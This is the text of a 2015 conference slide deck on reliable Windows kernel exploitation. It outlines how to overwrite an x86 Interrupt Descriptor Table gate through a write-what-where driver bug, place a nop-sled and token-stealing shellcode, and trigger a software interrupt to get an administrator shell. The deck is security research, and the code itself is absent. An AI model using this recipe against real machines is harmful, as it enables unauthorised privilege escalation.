abusing interrupts for reliable windows kernel exploitation (en)

Abusing Interrupts for Reliable Windows Kernel Exploitation

2015/11/14

AVTOKYO2015

inaz2

About me

• inaz2

• Security engineer & Python programmer• Working at NTT Communications

• Weblog “momoiro technology”• http://inaz2.hatenablog.com/

2

Windows kernel exploitation

• Attacks that exploit the vulnerability in the kernel land• Including the vulnerability in device drivers

• Write-what-where condition/vulnerability is widely used• Enables to write an arbitrary value to the arbitrary address

• Execute the shellcode to escalate privilege of the attacking process• Then launch the administrator command prompt

3

Classic technique: halDispatchTable overwrite

• nt!NtQueryIntervalProfile internal API• call [nt!halDispatchTable+4] via nt!KeQueryIntervalProfile

• Overwrite [nt!halDispatchTable+4] to shellcode

4

Replace token shellcode

• Copy the token object from System process (PID=4)

5

Replace 41414141h to the attacking process’ PID

It works but …

• Depending on the implementation of nt!NtQueryIntervalProfile• Kernel implementation may be changed in the future (i.e. not reliable)

• Is there the more reliable target to overwrite?

6

It works but …

• Depending on the implementation of nt!NtQueryIntervalProfile• Kernel implementation may be changed in the future (i.e. not reliable)

• Is there the more reliable target to overwrite?

7

x86 interrupt handling

• There are hardware interrupts (keyboard etc.) and software interrupts (zero division etc.)• Software interrupts are triggered by “int n” instruction

• Interrupt Descriptor Table (IDT)• Stores the addresses of hander functions (Interrupt Software Routines; ISR)

in each entry (interrupt gate)

• ISRs are executed in Ring 0• Can do everything

8

x86 privilege levels (protection rings)

• 4 privilege levels numbered from 0 to 3• The greater number means lesser privileges

• Most OS including Windows use only two rings• Ring 0 corresponding to kernel mode and Ring 3 to user mode

9

Interrupt Descriptor Table (1/4)

• Intel Developer’s Manual Volume 3, Chapter 6

10

Interrupt Descriptor Table (2/4)

• Intel Developer’s Manual Volume 3, Chapter 6

11

Can be interrupted from Ring 3 if DPL=3

Interrupt Descriptor Table (3/4)

• WinDbg (KD) view

12

Interrupt Descriptor Table (4/4)

• Overwrite the interrupt gate for interrupt #0

13

414184fc

000884fc 4141ee00

DPL=3

IDT overwrite technique

14

Get the IDT address

Overwrite the interrupt gate for interrupt #n

Trigger interrupt #n by “int n” instruction

Execute shellcode

Detailed procedure

16

Find the write-what-where vulnerability

• Write and install the vulnerable device driver• Enables to attack write-what-where vulnerability via IOCTL

17

Get the IDT address (1/2)

18

Can be used even in Ring 3!

Get the IDT address (2/2)

• The function that returns the IDT address

19

Disable alignment

Write the Interrupt Software Routine (ISR)

• Switch the value of fs segment register• 0x33 (TEB) → 0x30 (KPCR)

• Call the shellcode right after ISR

• Return by iretd instruction instead of ret

20

Allocate memory & put the codes

• Allocate nop-sled from 0x41410000 to 0x41420000

• Put the ISR code + shellcode from 0x41420000

21

Overwrite the interrupt gate

• Write 0x4141ee00 to the latter half of the interrupt gate for interrupt #32• #32-255 are designated as user-defined interrupts (not reserved)

22

Trigger the software interrupt

• Execute “int 32”• Shellcode is executed via ISR

• Then launch cmd.exe

23

Demo

24

What about 64 bit Windows?

• The size of interrupt gate increases to 16 bytes

• As 0x100000000 bytes nop-sled is quite hard, overwriting entire interrupt gate is required (i.e. write 2 times)

• However, my VirtualBox VM hangs up when the interrupt is triggered (PatchGuard??)

25

Comparison with halDispatchTable overwrite

• Pros• Reliable against all versions of x86-based Windows

• Easy to determine the address to be overwritten

• Cons• Need to prepare the ISR code

• Need to allocate nop-sled

• Not confirmed on 64 bit

26

Recap

• IDT overwrite technique is reliable against all versions of x86-based Windows• Independent with kernel implementation changes

• We can get the IDT address even in Ring 3

• There’s more than one way to do it

27

References

• Windowsでデバイスドライバの脆弱性からの権限昇格をやってみる -ももいろテクノロジー• http://inaz2.hatenablog.com/entry/2015/09/15/121926

• Project Zero: One font vulnerability to rule them all #4: Windows 8.1 64-bit sandbox escape exploitation• http://googleprojectzero.blogspot.jp/2015/08/one-font-vulnerability-to-rule-

them-all_21.html

• Interrupt Service Routines - OSDev Wiki• http://wiki.osdev.org/Interrupt_Service_Routines

• SIMPLE IS BETTER: Kernel Information Leak with Unprivileged Instructions (SIDT, SGDT) on x86 - WHY ?• http://hypervsir.blogspot.jp/2014/10/kernel-information-leak-with.html

28

Thank you!inaz2

29